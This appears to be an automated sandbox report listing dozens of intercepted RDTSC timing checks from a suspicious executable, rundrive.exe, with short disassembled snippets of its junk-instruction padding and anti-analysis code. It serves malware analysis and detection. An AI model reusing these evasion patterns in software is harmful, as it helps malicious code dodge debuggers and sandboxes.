Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 62A942 second address: 62A94E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FDA80C026B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 62AA74 second address: 62AA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 639066 second address: 639089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FDA80C026B8h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 639089 second address: 639091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 639091 second address: 639095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 637623 second address: 63764D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FDA80C0087Bh 0x0000000f jmp 00007FDA80C00882h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 637795 second address: 6377A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a js 00007FDA80C026B6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6377A6 second address: 6377C7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDA80C00885h 0x00000008 pop ecx 0x00000009 jnc 00007FDA80C0087Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6377C7 second address: 6377DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDA80C026BAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6377DC second address: 6377E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6377E0 second address: 6377EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6377EC second address: 6377F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6377F0 second address: 637832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FDA80C026C4h 0x00000013 jng 00007FDA80C026B6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007FDA80C026B6h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 637832 second address: 637838 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 637969 second address: 63796D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 63796D second address: 637977 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDA80C00876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 637ADE second address: 637B0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FDA80C026B6h 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007FDA80C026B6h 0x00000015 jmp 00007FDA80C026C2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 637B0E second address: 637B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 637B12 second address: 637B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FDA80C026B8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 637B20 second address: 637B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C00880h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6405C9 second address: 6405CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6405CD second address: 6405DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FDA80C0087Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6401A0 second address: 6401AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDA80C026B6h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 6401AE second address: 6401B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 64DF1F second address: 64DF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FDA80C026BCh 0x0000000c jne 00007FDA80C026B6h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 653CDF second address: 653CE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 657A56 second address: 657A6A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007FDA80C026B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FDA80C026B6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 657A6A second address: 657A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 657905 second address: 657920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDA80C026C3h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 65CEEE second address: 65CEF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 660F5C second address: 660F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 667AE3 second address: 667AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C0087Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 667AF6 second address: 667B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 671B01 second address: 671B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 671B07 second address: 671B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FDA80C026BEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 671B1B second address: 671B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 671D8A second address: 671D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 672A19 second address: 672A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 672A1F second address: 672A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 672A29 second address: 672A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 676604 second address: 67661C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 67A5A0 second address: 67A5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 67A5A4 second address: 67A5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe RDTSC instruction interceptor: First address: 67A5AA second address: 67A5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 67A5B0 second address: 67A5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 67A5B6 second address: 67A5C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FDA80C00876h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 6901E7 second address: 6901EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 6901EB second address: 6901EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69039D second address: 6903A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDA80C026B6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 6903A7 second address: 6903B3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA80C00876h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 6903B3 second address: 6903BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FDA80C026B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 697349 second address: 69734F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69734F second address: 69735B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDA80C026B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69735B second address: 69736E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007FDA80C00876h 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69736E second address: 69737A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FDA80C026B6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69737A second address: 69739F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDA80C0087Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FDA80C0088Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69739F second address: 6973A9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDA80C026B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 696421 second address: 69643B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDA80C00885h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 6966F2 second address: 6966F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 6966F8 second address: 696704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 696704 second address: 69671D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C026B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDA80C026BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 696B37 second address: 696B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 696DE1 second address: 696DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FDA80C026B6h 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 696DEE second address: 696DF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 696DF4 second address: 696DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 696DF8 second address: 696DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69A1FC second address: 69A202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69A27E second address: 69A29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FDA80C0087Fh 0x0000000c popad 0x0000000d push eax 0x0000000e jp 00007FDA80C0087Eh 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69A29F second address: 69A2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 mov edx, dword ptr [ebp+122D1E02h] 0x0000000c add dx, 0153h 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FDA80C026B8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jng 00007FDA80C026BCh 0x00000033 mov edx, dword ptr [ebp+122D1FD0h] 0x00000039 push 2E288CA5h 0x0000003e push eax 0x0000003f push edx 0x00000040 jnl 00007FDA80C026B8h 0x00000046 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69A2EA second address: 69A2F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69B7DF second address: 69B7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69D772 second address: 69D776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69D776 second address: 69D77C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69F462 second address: 69F476 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDA80C00876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007FDA80C00876h 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69F476 second address: 69F480 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C026B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 69F480 second address: 69F486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 402CE0 second address: 402CE0 instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push edi 0x00000007 push esi 0x00000008 imul eax, eax, 001E7319h 0x0000000e add eax, 3CFB5543h 0x00000013 rcr eax, 10h 0x00000016 add eax, esi 0x00000018 imul eax, edi 0x0000001b xor edx, edx 0x0000001d mul dword ptr [ebp+08h] 0x00000020 mov eax, edx 0x00000022 pop esi 0x00000023 pop edi 0x00000024 pop ebx 0x00000025 leave 0x00000026 retn 0004h 0x00000029 lea eax, dword ptr [eax+00000300h] 0x0000002f push eax 0x00000030 push 00405BFCh 0x00000035 call 00007FDA80C04085h 0x0000003a push ebp 0x0000003b mov ebp, esp 0x0000003d push ebx 0x0000003e push edi 0x0000003f push esi 0x00000040 mov edi, dword ptr [ebp+08h] 0x00000043 push 000000FFh 0x00000048 call 00007FDA80C0298Eh 0x0000004d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49504CA second address: 49504E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C00884h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 495057A second address: 4950597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, al 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dl, 50h 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 495064D second address: 4950652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4950597 second address: 49505D4 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, 1DA617DAh 0x00000011 pushfd 0x00000012 jmp 00007FDA80C026BBh 0x00000017 or si, 357Eh 0x0000001c jmp 00007FDA80C026C9h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4950652 second address: 4950669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 32F4BF98h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, F0DCh 0x00000014 mov bl, 3Eh 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49505D4 second address: 49505DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6A2F4792h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4950669 second address: 4950677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C0087Ah 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49505DE second address: 49505F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, di 0x00000012 mov di, 9A66h 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 4950677 second address: 49506CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FDA80C00884h 0x00000015 or esi, 3EBFC458h 0x0000001b jmp 00007FDA80C0087Bh 0x00000020 popfd 0x00000021 mov ch, B5h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007FDA80C0087Bh 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49506CA second address: 49506CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 49506CE second address: 49506E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00887h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
